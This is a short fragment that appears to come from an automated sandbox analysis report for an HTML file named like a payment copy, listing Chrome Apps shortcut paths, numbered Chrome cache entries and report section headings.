C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 58

Chrome Cache Entry: 59

Chrome Cache Entry: 60

Chrome Cache Entry: 61

Chrome Cache Entry: 62

Chrome Cache Entry: 63

Chrome Cache Entry: 64

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Static File Info

General

File Icon

Windows Analysis Report
swift-copy31072024PDF.html